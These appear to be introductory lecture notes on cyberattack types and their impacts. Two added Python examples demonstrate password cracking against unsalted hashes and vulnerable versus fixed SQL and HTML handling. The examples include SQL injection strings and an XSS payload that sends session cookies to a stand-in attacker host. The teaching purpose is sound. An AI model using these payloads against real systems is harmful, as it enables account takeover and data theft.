What is a Cyber Attack?

A cyberattack is any intentional effort to steal, expose, alter, disable, or destroy data, applications, or other assets through unauthorized access to a network, computer system, or digital device.

Evolution of Cyber Attacks

● Go through the links as discussed in class.
● https://www.manageengine.com/log-management/cyber-security-attacks/history-of-cyber-attacks.html
● https://www.codecademy.com/article/evolution-of-cybersecurity

Types of Cyber Attacks

● Cybercriminals use many sophisticated tools and techniques to launch cyberattacks against enterprise IT systems, personal computers, and other targets. Some of the most common types of cyberattacks include:
  ○ Malware
  ○ Social engineering
  ○ Denial-of-service attacks
  ○ Account compromise
  ○ Man-in-the-middle attacks
  ○ Supply chain attacks

Malware

● Malware is malicious software that can render infected systems inoperable. Malware can destroy data, steal information, or even wipe files critical to the operating system's ability to run. Malware comes in many forms, including:
  ○ Trojan horses
  ○ Ransomware
  ○ Scareware
  ○ Spyware
  ○ Rootkits
  ○ Viruses
  ○ Worms

Trojan Horse

Trojan horses disguise themselves as useful programs or hide within legitimate software to trick users into installing them. A remote access Trojan (RAT) creates a hidden back door on the victim's device, while a dropper Trojan installs additional malware once it has a foothold.

A Trojan horse:
● Cannot replicate itself; it relies on the user to install and run it.
● Often contains spying functions (such as a packet sniffer) or backdoor functions that allow the computer to be remotely controlled over the network.
● Is often hidden in useful-looking software such as screen savers or games.
● Examples: Back Orifice, NetBus, Whack-a-Mole.

Ransomware

Ransomware is malware that uses strong encryption to hold data or systems hostage. Cybercriminals then demand payment in exchange for the decryption key that releases the system and restores functionality.
According to IBM's X-Force Threat Intelligence Index, ransomware is the second most common type of cyberattack, accounting for 17% of attacks.

Scareware

● Scareware uses fake warning messages (for example, a pop-up claiming the computer is infected) to frighten victims into downloading malware or handing sensitive information to a fraudster.

Spyware

● Spyware is malware that secretly gathers sensitive information, such as usernames, passwords, and credit card numbers, and sends it back to the attacker.

Rootkits

● Rootkits are malware packages that give attackers administrator-level access to a computer's operating system or other assets while hiding their own presence from the user and from security tools.

Virus

● A virus is a program that attempts to damage a computer system and replicate itself to other computer systems.

A virus:
● Requires a host to replicate and usually attaches itself to a host file or a hard drive sector (for example, the boot sector).
● Replicates each time the host is used.
● Often focuses on destruction or corruption of data.
● Usually attaches to files that can execute code, such as .exe and .bat programs or .doc documents containing macros.
● Often spreads via e-mail. Many viruses can e-mail themselves to everyone in the victim's address book.
● Examples: Stoned, Michelangelo, Melissa, ILOVEYOU.

Worms

● Worms are self-replicating malicious code that spreads automatically between applications and devices, without needing a host file or any user action.
● A worm can degrade network performance simply through the traffic it generates while replicating itself.

A worm:
● Can install a backdoor on the infected computer.
● Is usually introduced into a system through a vulnerability.
● Infects one system and then spreads to other systems on the network.
● Example: Code Red.

Social Engineering Attacks

● Social engineering attacks manipulate people into doing things they shouldn't do, such as sharing information they shouldn't share, downloading software they shouldn't download, or sending money to criminals.

Phishing

● Phishing is one of the most pervasive social engineering attacks.
According to IBM's Cost of a Data Breach report, phishing is the second most common cause of breaches.
● The most basic phishing scams use fake emails or text messages to steal users' credentials, exfiltrate sensitive data, or spread malware.
● Phishing messages are designed to look as though they come from a legitimate source. They usually direct the victim to click a hyperlink that leads to a malicious website, or to open an email attachment that turns out to be malware.

Cybercriminals have also developed more sophisticated forms of phishing:
● Spear phishing is a highly targeted attack aimed at a specific individual, often using details from the victim's public social media profiles to make the ruse more convincing.
● Whale phishing (whaling) is a type of spear phishing that specifically targets high-level corporate officers.
● In a business email compromise (BEC) scam, cybercriminals pose as executives, vendors, or other business associates to trick victims into wiring money or sharing sensitive data.

Denial-of-service attacks

● Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks flood a system's resources with bogus traffic. The traffic overwhelms the system so that it can no longer respond to legitimate requests. In a DDoS attack the traffic comes from many compromised machines (a botnet) at once, which makes it much harder to block at the source. A denial-of-service attack may be an end in itself or a distraction that sets up another attack.

Account compromise

● Account compromise is any attack in which attackers hijack a legitimate user's account for malicious activity.
● Attackers can break into a user's account in many ways. They can steal credentials through phishing attacks or buy stolen password databases on the dark web.
● Stored passwords are normally hashed rather than encrypted, so attackers use password-cracking tools such as Hashcat and John the Ripper to recover passwords from leaked hashes, or they stage brute-force attacks, in which automated scripts or bots generate and test candidate passwords against the login until one works.
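The password-cracking step above is easy to see in code. The following example is added here to illustrate the technique and is not part of the original notes; the leaked table, the wordlist and the user names are constructed for the example. It runs a dictionary attack against unsalted SHA-256 hashes (one hash per candidate for the whole dump), then repeats the attack against per-user salted PBKDF2 records, where every user/candidate pair costs a separate slow derivation.

```python
import hashlib
import hmac
import os

# Constructed sample "leak": a password table stored as unsalted SHA-256
# digests, as an attacker might buy it. The third password is deliberately
# absent from the wordlist below so it survives the attack.
LEAKED_SHA256 = {
    "alice": hashlib.sha256(b"password").hexdigest(),
    "bob": hashlib.sha256(b"letmein").hexdigest(),
    "carol": hashlib.sha256(b"Tr0ub4dor&3").hexdigest(),
}

# Constructed wordlist standing in for a real one such as rockyou.txt.
WORDLIST = ["123456", "password", "qwerty", "letmein", "admin", "welcome"]


def crack_unsalted(leaked: dict, wordlist: list) -> dict:
    """Offline dictionary attack against unsalted hashes.

    Each candidate is hashed once and compared against every user at the
    same time, so the cost is one hash per candidate no matter how many
    accounts are in the dump. Returns {user: recovered_password}.
    """
    lookup = {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup[h] for user, h in leaked.items() if h in lookup}


def pbkdf2_store(password: str, iterations: int = 200_000) -> tuple:
    """Defender side: a fresh random salt per user plus a deliberately slow
    key-derivation function. Returns (salt, iterations, digest)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest


def pbkdf2_verify(password: str, salt: bytes, iterations: int, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(candidate, digest)


def crack_salted(store: dict, wordlist: list) -> tuple:
    """The same dictionary against salted PBKDF2 records.

    The precomputed lookup table is useless because every user has a
    different salt, so each (user, candidate) pair needs its own slow
    derivation. Returns ({user: password}, number_of_kdf_calls) so the
    attacker's extra work is visible.
    """
    cracked, work = {}, 0
    for user, (salt, iters, digest) in store.items():
        for candidate in wordlist:
            work += 1
            if pbkdf2_verify(candidate, salt, iters, digest):
                cracked[user] = candidate
                break
    return cracked, work


if __name__ == "__main__":
    print("unsalted SHA-256:", crack_unsalted(LEAKED_SHA256, WORDLIST))
    store = {u: pbkdf2_store(p) for u, p in
             [("alice", "password"), ("bob", "letmein"), ("carol", "Tr0ub4dor&3")]}
    cracked, work = crack_salted(store, WORDLIST)
    print("salted PBKDF2:", cracked, "after", work, "slow derivations")
```

The weak passwords still fall in both cases; what the salt and the iteration count buy is that the attacker can no longer amortise one hash across the whole dump, and each guess costs roughly 200,000 hash operations instead of one. That is why the practical defences against this attack are a slow, salted hash on the server and a non-dictionary password (or multi-factor authentication) on the user side.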
Man-in-the-middle (MitM) Attack

● In a man-in-the-middle (MitM) attack, also called an "eavesdropping attack," an attacker secretly intercepts, and possibly alters, communications between two people or between a user and a server. MitM attacks are commonly carried out over unsecured public Wi-Fi networks, where it is relatively easy for threat actors to spy on traffic. Encryption such as TLS (HTTPS) is the main defence: the attacker sees only ciphertext and cannot impersonate the server without a certificate the client trusts.

Supply Chain Attacks

● Supply chain attacks are cyberattacks in which attackers breach a company by targeting its software vendors, material suppliers, and other service providers. Because vendors are often connected to their customers' networks in some way, attackers can use the vendor as an attack vector to reach many targets at once.
● For example, in 2020, Russian state actors compromised the software vendor SolarWinds and distributed malware to its customers under the guise of a software update. The malware allowed Russian spies to access the sensitive data of various US government agencies that used SolarWinds' products, including the Treasury, Justice, and State Departments.

Cross-site scripting (XSS)

● Cross-site scripting (XSS) attacks inject malicious script into a legitimate web page or web application, typically through an input field or URL parameter whose value the site echoes back into the page without escaping it. When another user visits the page, the script runs in that user's browser in the context of the trusted site, usually stealing session cookies or other sensitive information, or redirecting the user to a spoofed, malicious website. Attackers almost always use JavaScript for XSS attacks.

SQL injection attacks

● SQL injection attacks abuse an application that builds Structured Query Language (SQL) queries by pasting user input directly into the query text. Attackers enter specially crafted input through user-facing fields such as search bars and login forms; the input changes the meaning of the query that the backend database executes, prompting it to return private data such as credit card numbers or customer details, bypass authentication, or modify or delete records.

Zero-day exploits

● Zero-day exploits take advantage of zero-day vulnerabilities: flaws that are unknown to the vendor and the security community, or known but not yet patched, so that defenders have had "zero days" to prepare a fix.
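Both XSS and SQL injection are the same underlying mistake: untrusted input is concatenated into text that an interpreter (the browser's HTML parser, the database's SQL parser) will later execute. The example below is added to illustrate both sections and is not code from the original notes; the users table, the card numbers and the attacker payloads are constructed for the example. It shows the login query and the comment rendering in their vulnerable form next to the fixed form (a parameterised query and HTML escaping).

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample backend: a users table holding the data an attacker wants."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, card TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hunter2", "4111-1111-1111-1111"),
         ("bob", "s3cret", "5500-0000-0000-0004")],
    )
    return conn


# --- SQL injection -------------------------------------------------------

def login_vulnerable(conn, username: str, password: str) -> list:
    """The mistake: user input is pasted into the SQL text, so a quote in
    the input ends the string literal and everything after it becomes SQL."""
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username: str, password: str) -> list:
    """The fix: a parameterised query. The SQL text is fixed and the values
    travel separately, so the database never parses the input as code."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


# --- Cross-site scripting ------------------------------------------------

def render_comment_vulnerable(comment: str) -> str:
    """Stored XSS: the comment is echoed into the page as raw HTML."""
    return '<p class="comment">%s</p>' % comment


def render_comment_safe(comment: str) -> str:
    """The fix: escape <, >, &, and quotes before interpolating, so the
    browser displays the text instead of executing it."""
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)


def has_script_tag(page: str) -> bool:
    """Crude check used only in this example: did a raw <script> tag reach the page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    conn = make_db()
    # Authentication bypass: the SQL comment marker "--" discards the password check.
    print(login_vulnerable(conn, "alice'--", "wrong"))              # ['alice']
    # Data extraction: UNION appends the card column to the result set.
    print(login_vulnerable(conn, "' UNION SELECT card FROM users--", "x"))
    print(login_safe(conn, "alice'--", "wrong"))                    # []
    print(login_safe(conn, "alice", "hunter2"))                     # ['alice']

    payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    print(has_script_tag(render_comment_vulnerable(payload)))       # True
    print(has_script_tag(render_comment_safe(payload)))             # False
```

Note that the safe versions do not try to detect "bad" input; they change how the input is handed to the interpreter so that it can only ever be data. Input filtering is a second layer at best, because attackers routinely find encodings the filter did not anticipate.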
These vulnerabilities can exist for days, months, or years before developers learn about the flaws, making them prime targets for attackers.

DNS spoofing attacks

● DNS spoofing attacks, also called "DNS poisoning," forge DNS responses or corrupt a resolver's cache so that a website's domain name resolves to an attacker-controlled IP address instead of the real one. When victims try to visit the real site, they are unknowingly delivered to a malicious copy that steals their data or spreads malware.

Impact of Cyber Attacks at the Individual Level

1. Financial Losses: Individuals may suffer financial losses through theft of personal information such as credit card details or bank account credentials, or through identity theft.
2. Identity Theft: Cyber attacks can result in identity theft, where personal information is used to impersonate the victim for fraudulent activities, damaging the victim's credit score and financial reputation.
3. Privacy Breaches: Individuals may experience breaches of privacy when attackers gain unauthorized access to personal data, including sensitive information such as medical records, private communications, or personal photos.
4. Emotional Distress: Victims of cyber attacks may experience emotional distress, anxiety, or trauma due to the violation of their privacy and the loss of control over their own information.
5. Reputation Damage: If personal information or embarrassing data is leaked online as a result of a cyber attack, individuals may suffer reputational damage affecting their personal and professional lives.
6. Potential Physical Harm: In extreme cases, cyber attacks on individuals, such as those targeting medical devices or connected infrastructure (for example, smart home systems), can result in physical harm or endanger life.

Impact of Cyber Attacks at the Organizational Level

1. Financial Losses: Cyber attacks on organizations can result in significant financial losses due to theft of funds, disruption of business operations, and the costs of incident response, recovery, and potential legal liabilities.
2. Reputation Damage: Organizations may suffer reputational damage from breaches of customer data or failure to protect sensitive information, leading to loss of trust among customers, partners, and stakeholders.
3. Operational Disruption: Cyber attacks can disrupt business operations, causing downtime, loss of productivity, and disruption of supply chains, leading to direct financial losses and long-term damage to competitiveness.
4. Intellectual Property Theft: Organizations may suffer theft of intellectual property through cyber attacks, resulting in loss of competitive advantage, compromised innovation, and potential legal battles.
5. Regulatory Compliance Issues: Cyber attacks can lead to non-compliance with data protection regulations, resulting in fines, penalties, and legal consequences for the organization.
6. Damage to Infrastructure: Certain cyber attacks, such as those targeting critical infrastructure or industrial control systems, can cause physical damage, disrupt essential services, and even endanger lives.